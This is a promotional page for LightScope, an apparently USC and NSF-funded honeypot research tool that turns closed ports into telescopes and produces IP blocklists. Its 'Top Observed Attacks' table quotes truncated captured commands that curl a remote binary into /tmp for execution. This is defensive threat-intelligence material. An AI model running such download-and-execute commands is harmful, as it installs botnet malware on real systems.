Free, Open Source, Cybersecurity Research

IP Blocklists Work... Until They Don't.

Install LightScope And See What You're Missing.

The table below shows how IPs observed attacking LightScope endpoints can be misclassified by other services.

Attacker IP AbuseIPDB Score GreyNoise Status GreyNoise Class LightScope Blocklist Interactions
Loading attack data...
Table Generated: Loading...

Why Should You Install LightScope?

Problem

IP reputation services and blocklists are conservative. They build consensus before blocking IPs, and due to spoofing concerns, they don't like to ban IPs they can't verify. This means some attacker IPs aren't correctly blocked.

Solution

Deploying LightScope on your network helps these services correctly categorize unwanted traffic, gives you detailed threat intelligence, and provides personalized blocklists for your network to augment the ones you already have.

Installing LightScope Will:

  • Support Research, The Open Source Community, And Make the Internet A Better Place
  • Give You Detailed Threat Intelligence About Who's Targeting You
  • Provide You With Personalized Blocklists To Augment The Ones You Already Have
  • Not Cost You Anything
General Dashboard View

General Dashboard Overview

Individual Threat Actors View

Individual Threat Actors

What is LightScope?

LightScope is a free, open source cybersecurity research initiative that examines unwanted traffic from attackers and scanners. LightScope is different from existing solutions as it turns closed ports on live machines into network telescopes/honeypots, and transparently forwards attacker traffic to USC managed honeypots. This removes the risk of running honeypots on production systems, and makes LightScope difficult for attackers to detect and avoid (unlike traditional honeypots and network telescopes). All this leads to better data for researchers and network operators.

The LightScope client is free, open source, extremely lightweight, and designed to run on production machines. If you install it you will be provided with rich information about who's targeting your network and tailored IP blocklists you can use to keep your network safe.

LightScope is based upon work supported by the U.S. National Science Foundation under Grant No. 2313998 and the University of Southern California Information Sciences Institute.

Your IP BlockList Is Too Forgiving.

Support NSF Cybersecurity Research at the University of Southern California, and the Open Source Community!

See who's targeting your systems • Get custom IP blocklists • Help us make the internet safer.

IRB Certified Data Protection
LightScope has passed IRB approval verifying our anonymization, collection, and encrypted storage methods (certified exempt), as study UP-25-00124 — LightScope - Survey of unwanted traffic to large user populations to the University of Southern California Institutional Review Board.

How LightScope Compares

See how LightScope's unique approach provides advantages over other security tools and services.

VS

GreyNoise

LightScope runs on production hosts instead of dedicated honeypots, providing a different vantagepoint.

VS

AbuseIPDB & SpamHaus

LightScope blocks IPs faster. We report our findings to these services, but it may take more than our reports to get an IP blocked.

VS

Cisco Talos

LightScope is free, open source, and vendor-neutral - not limited to any one vendor's ecosystem.

VS

Fail2Ban

LightScope analyzes traffic at a lower level with more visibility, detecting things like port scans that Fail2Ban doesn't analyze.

VS

CrowdStrike Falcon

LightScope won't brick your system, as it doesn't need to run as root/admin. It's free, open source, and ultra-lightweight.

VS

SentinelOne Singularity

LightScope won't slow down your system as it doesn't scan running processes or system memory.

VS

EDR/XDR

LightScope is not EDR/XDR. LightScope gathers information about attackers and produces IP blocklists. Unlike EDR/XDR, it is extremely fast and won't bog down your system inspecting processes or memory. It is designed to work with your existing EDR/XDR solutions.

VS

Honeypots

LightScope runs on production systems, which attackers target. Attackers avoid dedicated honeypots, but to attackers LightScope systems appear real (because they are). LightScope is more secure than running your own honeypot, as it transparently forwards attackers to USC managed honeypots.

VS

Network Telescopes

Attackers avoid darkspace hosting network telescopes. LightScope works with your in use IP addresses and live machines. Feel free to use both and get complete network coverage!

Top Observed Attacks

Real attack commands captured by LightScope honeypots running on production systems

Attack Type Attacker IP Command Preview
Malware Download & Execute Campaign 196.251.71.119
nohup $SHELL -c "curl http://47.236.20.49:60120/linux -o /tmp/haBCRfTf6Z...
Encrypted Payload Deployment 159.89.105.244
nohup $SHELL -c "curl http://8.220.245.115:60117/linux -o /tmp/Xqmvb45Dzl...
Multi-Stage Botnet Infection 204.48.23.8
nohup $SHELL -c "curl http://47.239.192.107:60140/linux -o /tmp/QNl0GdStgG...
Click any attack to view full details and analysis

IP Intelligence Report

Attacker Intelligence Report -- IP metadata provided by ipinfo.io powered by IPinfo.io
LightScope Honeypot Interactions
Observed Attacker Scan Activity Across All LightScope Endpoints
Loading port activity data...

Attack Analysis Report

Attack Type
Source IP Address
Attack Command Details
Threat Analysis

Acknowledgments

IPinfo.io

We gratefully acknowledge IPinfo.io for their generous support of academic research by providing free access to their comprehensive IP geolocation and intelligence data.

Visit IPinfo.io

AbuseIPDB

We thank AbuseIPDB for their partnership and support of LightScope. Their comprehensive IP reputation database and commitment to cybersecurity research helps make the internet safer for everyone.

Visit AbuseIPDB

GreyNoise.io

We gratefully acknowledge GreyNoise.io for their generous support of academic research by providing free access to their comprehensive intelligence data.

Visit GreyNoise
NSF Logo

This material is based upon work supported by the U.S. National Science Foundation under Grant No. 2313998. Any opinions, findings, and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the U.S. National Science Foundation.

University of Southern California

ISI Logo Viterbi Logo USC Logo

Information Sciences Institute & Viterbi School of Engineering